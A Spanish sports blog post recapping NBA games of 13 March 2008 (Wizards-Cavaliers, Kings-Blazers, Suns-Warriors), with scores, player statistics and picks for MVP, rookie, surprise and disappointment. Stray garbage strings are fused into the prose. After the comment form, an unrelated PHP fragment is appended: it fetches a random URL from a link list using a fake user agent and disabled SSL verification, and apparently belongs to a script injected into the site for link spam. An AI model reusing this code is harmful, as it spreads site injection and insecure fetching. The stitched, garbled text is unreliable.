La crónica (13/03/08)

14 de March de 2008 por MagicJohnson32

El siempre prometedor Warriors-Suns era lo más destacado de una noche con sólo tres partidos que también presentaba el interesante enfrentamiento entre Cavaliers y Wizards y el intrascendente Blazers-Kings.

La crónica: cbbwlbj

El regreso de Caron Butler (el día que cumplía 28 años) tras varias semanas de baja por una lesión en la cadera se tradujo en victoria para los Wizards. Los de la capital vencieron 99-101 a Cleveland con todo el quinteto y dos suplentes en dobles figuras en anotación, encabezados por los 19 puntos de Butler. Para los Cavs, que siguen echando en falta a Ilgauskas, no bastaron los 25 de LeBron y los 24 de Pavlovic. James sumó 7 rebotes y 7 asistencias pero cometió 7 pérdidas de balón y erró seis de sus siete lanzamientos en el último periodo, incluyendo el tiro que pudo haber dado la victoria a los Cavs. Cleveland se mantiene 4º con dos partidos de ventaja sobre Toronto y cuatro sobre los Wizards.

baronlaysunsEn un partido sin nada en juego, los Kings vencieron a los Blazers 85-96, con 22 puntos de Artest y 14-8-7 de Udrih. Aldridge y Roy volvieron a ser los mejores de unos Blazers que tendrán que esforzarse si quieren acabar la temporada con más de un 50% de victorias.

Mucho más importante y espectacular resultó el triunfo de los Suns ante los Warriors, un duelo que suele dejar puntuaciones altísimas y anoche no fue una excepción. Phoenix se impuso por 115-123 pese al magnífico partido de Baron Davis, que logró 38 puntos, 9 rebotes, 8 asistencias y 3 robos. La réplica la pusieron Nash, con 21 puntos y 13 asistencias, y especialmente Amare Stoudemire, autor de 36 puntos, 11 rebotes y 4 tapones. De este modo, los Suns quedan a 2,5 partidos de los Lakers, líderes de división y conferencia, y los Warriors conservan una diferencia de dos partidos sobre los Nuggets, sus principales rivales por la 8ª posición.

Nuestro MVP: Dos jugadores sobresalieron en una jornada de poca actividad. Baron Davis completó una actuación descomunal, rozando el triple doble mientras se iba hasta los 38 puntos. Sin embargo, su equipoamaredunkswarriors perdió ante los Suns de Amare, quien anotó 13 de 21 tiros de campo, 10 de 12 desde la línea de personal, atrapó 11 rebotes, dio 4 asistencias y puso 4 tapones; números dignos de un MVP.

El rookie: Ante el escaso protagonismo que anoche tuvo Hawes, nos quedamos con el quinto partido consecutivo en el que Nick Young alcanza al menos 10 puntos.

La sorpresa: los 24 puntos de Pavlovic con 9 de 15 en tiros en su segundo partido tras regresar de la lesión, y el 7 de 8 de Songaila pese a volver al banquillo una vez que Butler se ha recuperado son lo más llamativo de la pasada noche.

La decepción: Kevin Martin tuvo una noche para olvidar, falló 9 tiros de los 11 que intentó, se quedó en 6 puntos, 2 rebotes y 1 asistencia y además perdió 4 balones para un -3 de eficiencia.

El dato: Espectacular estadística la que ofrecieron los Warriors anoche, con 105 lanzamientos intentados y sólo 43 aciertos procedentes de 17 asistencias. Mucho más efectivos fueron los Suns, con 82 lanzamientos de campo, 45 aciertos y 27 asistencias. Así les fue.

Finalizamos con las 10 mejores jugadas de la noche:

 

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Muy lograda..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>